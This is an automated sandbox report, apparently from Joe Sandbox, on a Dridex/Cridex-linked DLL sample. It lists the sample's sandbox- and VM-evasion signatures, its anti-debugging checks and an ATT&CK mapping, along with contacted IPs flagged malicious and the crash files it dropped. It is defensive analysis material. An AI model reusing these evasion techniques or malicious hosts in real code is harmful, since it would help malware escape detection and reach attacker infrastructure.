Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\System32\loaddll32.exe

Section loaded: OutputDebugStringW count: 1638

Source: C:\Windows\System32\loaddll32.exe

Window / User API: threadDelayed 1638

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E870730 GetTokenInformation,GetSystemInfo,GetTokenInformation,

1_2_6E870730

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WerFault.exe, 00000007.00000002.293832184.00000000050C7000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000002.293717271.0000000005035000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.290926093.0000000005035000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.290564992.00000000050C7000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.290170720.00000000050C7000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 35 44 6e 75 85 11 47-bd a2 bb ed 21 43 9f 89
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E866D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

1_2_6E866D0C

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E873138 RtlAddVectoredExceptionHandler,

1_2_6E873138

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.28165.dll",#1

Jump to behavior

Source: loaddll32.exe, 00000001.00000002.777755701.0000000001980000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.257966602.0000000003830000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.261440454.0000000003830000.00000002.00020000.sdmp	Binary or memory string: uProgram Manager
Source: loaddll32.exe, 00000001.00000002.777755701.0000000001980000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.257966602.0000000003830000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.261440454.0000000003830000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.777755701.0000000001980000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.257966602.0000000003830000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.261440454.0000000003830000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.777755701.0000000001980000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.257966602.0000000003830000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.261440454.0000000003830000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

1_2_6E866D0C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

1_2_6E866D0C

Source: Amcache.hve.7.dr

Binary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion11	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Security Software Discovery31	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Virtualization/Sandbox Evasion11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Account Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery13	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	19%	Virustotal		Browse
SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	23%	ReversingLabs	Win32.Worm.Cridex

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.0.rundll32.exe.6e860000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
1.2.loaddll32.exe.6e860000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
1.2.loaddll32.exe.1080000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.rundll32.exe.3290000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.rundll32.exe.6e860000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
3.0.rundll32.exe.3290000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.rundll32.exe.3290000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.rundll32.exe.6e860000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.forex-broker.websiteDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.7.dr	false		high
http://www.forex-broker.websiteDVarFileInfo$	loaddll32.exe, 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.259884541.000000006E87F000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.4.135.27	unknown	Greece	199246	TOPHOSTGR	true
85.10.248.28	unknown	Germany	24940	HETZNER-ASDE	true
80.211.3.13	unknown	Italy	31034	ARUBA-ASNIT	true
144.91.122.102	unknown	Germany	51167	CONTABODE	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	544258
Start date:	23.12.2021
Start time:	00:20:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.W32.AIDetect.malware2.28165.16859 (renamed file extension from 16859 to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.evad.winDLL@6/6@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 98.6%) Quality average: 79.8% Quality standard deviation: 24.3%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.189.173.21 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
00:21:33	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.4.135.27	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
85.10.248.28	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
80.211.3.13	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TOPHOSTGR	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	185.4.135.27
	Positive_Result_75184731.xls	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
ARUBA-ASNIT	gF1nMkOSsT0Jq.dll	Get hash	malicious	Browse	212.237.56.116
	QkurFOUhAa.dll	Get hash	malicious	Browse	212.237.56.116
	vEppFl04X8.dll	Get hash	malicious	Browse	212.237.56.116
	ZTnCUycB1g.dll	Get hash	malicious	Browse	212.237.56.116
	jJv4XYBWoC.dll	Get hash	malicious	Browse	212.237.56.116
	xVOS8F9XiH.dll	Get hash	malicious	Browse	212.237.56.116
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse	80.211.3.13
	triage_dropped_file.dll	Get hash	malicious	Browse	80.211.3.13
	JmIEoE25N1.dll	Get hash	malicious	Browse	212.237.56.116
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse	80.211.3.13
	triage_dropped_file.dll	Get hash	malicious	Browse	80.211.3.13
	triage_dropped_file.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	80.211.3.13
	yXVganwQXW.dll	Get hash	malicious	Browse	212.237.56.116
	KT9GKWEcbY.dll	Get hash	malicious	Browse	212.237.56.116
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	80.211.3.13
	triage_dropped_file.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	80.211.3.13
HETZNER-ASDE	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse	85.10.248.28
	triage_dropped_file.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse	85.10.248.28
	triage_dropped_file.dll	Get hash	malicious	Browse	85.10.248.28
	triage_dropped_file.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	85.10.248.28
	triage_dropped_file.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	85.10.248.28
	UGDLmAm2UI.exe	Get hash	malicious	Browse	176.9.111.171
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	85.10.248.28
	Positive_Result_75184731.xls	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	tTy0oHh7FM.exe	Get hash	malicious	Browse	148.251.234.83
	ykTwsaBnqa.exe	Get hash	malicious	Browse	144.76.84.177

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_cb141ddbd73935fa41bc7de65f3b5892ae8957_82810a17_19102adb\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9221392096330553
Encrypted:	false
SSDEEP:	192:jYi20oXPJ/HBUZMX4jed+fP/u7sBS274ItWc:siwXPJ/BUZMX4jeKP/u7sBX4ItWc
MD5:	22C62B74B234869135A4E9A714C759E7
SHA1:	B2BFE27101F367EA0F32D7D8130EB94404D2FDA5
SHA-256:	73870BAA34D39FDE9A317CF4F0BBF94291F9EE91FCC6E68A5EADB345E761C412
SHA-512:	71135017C1BFEA9DDD16BEF7B69DAC337B3E8FE5AE953C65E8D478E041568ACFEB9BF76B724663FF80112DC357E778857A11E10D5F104F4591DE529C5C1A08EC
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.4.7.2.1.2.8.2.9.1.6.9.7.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.4.7.2.1.2.8.8.8.2.3.1.9.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.7.5.3.d.a.2.-.e.1.5.f.-.4.1.3.5.-.b.5.e.6.-.f.6.5.b.7.3.a.6.8.0.f.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.9.a.4.9.2.1.e.-.2.f.7.c.-.4.0.6.a.-.8.a.7.2.-.3.3.c.b.2.b.2.4.7.2.7.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.d.8.-.0.0.0.1.-.0.0.1.7.-.d.c.f.1.-.d.5.0.d.d.6.f.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER169.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Dec 23 08:21:24 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	44176
Entropy (8bit):	2.186798806470374
Encrypted:	false
SSDEEP:	192:hoSl0XFtsbozvO5SkbmQDqi842IKCn7lEng:6tsum5LbpSkKCnxE
MD5:	CECE8F159FABEAE2D23EBEEB97377593
SHA1:	E615AE72674D9109EF641FF438A11B8748B53023
SHA-256:	DBC9352921AAC3757540AC520E5EA80DA264BAE3C87CC12592DB52289522F56B
SHA-512:	FBE3A7422A500A0642F381E8EAC29D2D154BDA9FA210E90B7C4907F50F1F2A7C9AC48467D2A772078350B0E7A59876DF7007A4C7DB3F820A1C2AF27FA76DAF51
Malicious:	false
Reputation:	low
Preview:	MDMP....... ........1.a.........................................-..........T.......8...........T...........@...P............................................................................................U...........B...... .......GenuineIntelW...........T...........{1.a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E3.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8326
Entropy (8bit):	3.690573663154269
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi0v67zH6Yih6FgmfT/WS4CprJ89b8csffUm:RrlsNiM6P6Y06FgmfT/WSm8vfZ
MD5:	C7EC3F984AD1C0CFE1533950A4E301CC
SHA1:	7105D01259A549F30F912ACE0668B8E6B2D9B0D9
SHA-256:	76988F5DA21FD3B0FE61643C3CF226756E553326EBC6850A04265CD2C732F347
SHA-512:	79ED62637549BDEFA17D7386C114577F6D25D2A557F8D15B22C1D288067AD39CD5A9B8D35BE457287897379A164CE26B4160B312725E9E2D30CDE826D3904D5C
Malicious:	false
Reputation:	low
